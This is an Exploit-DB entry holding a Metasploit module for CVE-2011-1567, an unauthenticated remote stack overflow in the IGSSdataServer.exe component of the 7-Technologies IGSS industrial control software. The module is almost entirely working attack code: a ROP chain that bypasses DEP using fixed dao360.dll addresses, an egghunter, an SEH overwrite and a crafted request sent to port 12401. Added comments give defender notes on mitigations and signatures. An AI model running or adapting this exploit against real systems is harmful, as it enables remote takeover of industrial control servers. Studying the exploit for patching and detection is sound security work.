7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit)

EDB-ID:

17300




Platform:

Windows

Date:

2011-05-16


##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit remote exploit module for CVE-2011-1567: a stack-based buffer
# overflow in IGSSdataServer.exe (7-Technologies IGSS up to 9.00.00 b11063),
# reached while the server processes a ListAll command over TCP.
#
# Defender notes (derived from the code in this file):
# - The module connects and sends one request with no login exchange, so any
#   host that can reach the data server port (default 12401 below) can reach
#   the vulnerable code path. Restricting that port to trusted hosts and
#   applying the vendor fix are the relevant mitigations (fixed version is
#   not stated on this page).
# - The only target is labelled "DEP Bypass": DEP alone does not stop this
#   module. The ROP chain and pivot use hard-coded addresses attributed to
#   dao360.dll, so it depends on that DLL loading at a fixed base
#   (presumably no ASLR on the listed XP SP3 / 2003 targets -- confirm).
# - Most of the request is random filler (see #junk and rand_text below), so
#   whole-payload byte signatures will not match across runs; the constant
#   header prefix and the oversized request length are the stable features.
class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Tcp

	# Registers module metadata (name, references, target, payload
	# constraints) and the default remote port.
	#
	# @param info [Hash] metadata overrides merged in through update_info
	def initialize(info={})
		super(update_info(info,
			'Name'           => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",
			'Description'    => %q{
					This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
				IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
				fails to do proper bounds checking before copying data into a small buffer on the stack.
				This causes a buffer overflow and allows to overwrite a structured exception handling record
				on the stack, allowing for unauthenticated remote code execution.
			},
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12639 $',
			'Author'         =>
				[
					'Luigi Auriemma', #Initial discovery, poc
					'Lincoln',        #Metasploit
					'corelanc0d3r',   #Rop exploit, combined XP SP3 & 2003 Server
					'sinn3r',         #Serious Msf style policing
				],
			'References'     =>
				[
					['CVE', '2011-1567'],
					# NOTE(review): empty OSVDB id -- this entry carries no reference.
					['OSVDB', ''],
					['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
				],
			'Payload'        =>
				{
					# NUL is the only byte excluded from the encoded payload.
					'BadChars' => "\x00",
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => 'process',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
						{
							# 'Ret' is written at 'Offset' bytes into the buffer (see #exploit);
							# per the Description this lands on the SEH record.
							'Ret'    => 0x1b77ca8c,  #dao360.dll pivot 1388 bytes
							'Offset' => 500
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "March 24 2011",
			'DefaultTarget'  => 0))

			# Default TCP port of the IGSS data server; the port to filter or monitor.
			register_options(
			[
				Opt::RPORT(12401)
			], self.class)
	end

	# Returns a random 32-bit integer built from four bytes of rand_text.
	# Used as filler for ROP-chain slots whose value is never used. Each call
	# yields a new value, so the chain's filler bytes differ on every run.
	#
	# @return [Integer]
	def junk
		return rand_text(4).unpack("L")[0].to_i
	end

	# Builds the oversized ListAll request and sends it in a single write.
	#
	# Layout of the bytes sent, in order:
	#   header : 22 constant bytes + 14 random bytes
	#   sploit : ROP chain, 10 x 0x90, egghunter, random pad up to 'Offset',
	#            4-byte 'Ret' value, egg (encoded payload), 2000 random bytes
	#
	# The request is therefore well over 2.5 KB with a fixed 22-byte prefix.
	# NOTE(review): whether that prefix also appears in legitimate ListAll
	# traffic is not shown here -- confirm before using it alone as a signature.
	def exploit

		# Options for the Egghunter mixin's generate_egghunter.
		# NOTE(review): 'w00t' is presumably the marker placed in front of the
		# egg; if so it may be visible in captured traffic -- confirm.
		eggoptions =
		{
			:checksum => false,
			:eggtag => 'w00t',
			:depmethod => 'virtualprotect',
			:depreg => 'esi'
		}

		# Duplicates the 'BadChars' value declared in the module metadata.
		badchars = "\x00"
		hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

		# Every gadget address below is a hard-coded absolute address in the
		# 0x1b7xxxxx range (dao360.dll per the original comments); the chain is
		# only valid while that module is mapped at the same base.
		#dao360.dll - pvefindaddr rop 'n roll
		rop_chain = [
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b72f174,  # POP EAX # RETN 08
			# 0xA1A10101 + 0x5E5F0000 wraps to 0x00000101 in 32 bits, so the
			# value is formed without a NUL byte in the request.
			0xA1A10101,
			0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08 
			junk,
			junk,
			0x1b73a55c,  # XCHG EAX,EBX # RETN
			junk,
			junk,
			0x1b724004,  # pop ebp
			0x1b72f15f,  # &push esp # retn 8
			0x1b72f040,  # POP ECX # RETN
			0x1B78F010,  # writeable
			0x1b7681c2,  # xor eax,eax # retn
			0x1b72495c,  # add al,40 # mov [esi+4],eax # pop esi # retn 4
			0x41414141,  
			0x1b76a883,  # XCHG EAX,ESI # RETN 00  
			junk,
			0x1b7785c1,  # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C 
			junk,
			junk,
			0x1b78535c,  # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
			junk,
			junk,
			junk,
			junk,
			0x1b7280b4,  # POP EDI # XOR EAX,EAX # POP ESI # RETN
			junk,
			junk,
			junk,
			junk,
			0x1b7681c4,  # rop nop (edi)
			0x90909090,  # esi -> eax -> nop
			0x1b72f174,  # POP EAX # RETN 08
			0xA1F50214,  # offset to &VirtualProtect
			0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08
			junk,
			junk,
			0x1b73f3bd,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
			junk,
			junk,
			0x1b76a883,  # XCHG EAX,ESI # RETN 00
			0x1b72f040,  # pop ecx
			0x1B78F010,  # writeable (ecx)
			0x1b764716,  # PUSHAD # RETN
		].pack('V*')  # each entry packed as a 32-bit little-endian value

		# Constant 22-byte prefix, then 14 random bytes (36-byte header).
		header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
		header << rand_text(14)
		# sploit is the same String object as rop_chain, so the appends below
		# mutate rop_chain too; harmless because rop_chain is not reused.
		sploit = rop_chain
		sploit << "\x90" * 10
		sploit << hunter
		# Random pad so that the next four bytes sit at target['Offset'] (500).
		sploit << rand_text(target['Offset'] - (sploit.length))
		sploit << [target.ret].pack('V') 
		sploit << egg
		sploit << rand_text(2000)

		# One connection, one write, no authentication step before the request.
		connect
		print_status("Sending request...")
		sock.put(header + sploit)
		handler
		disconnect

	end

end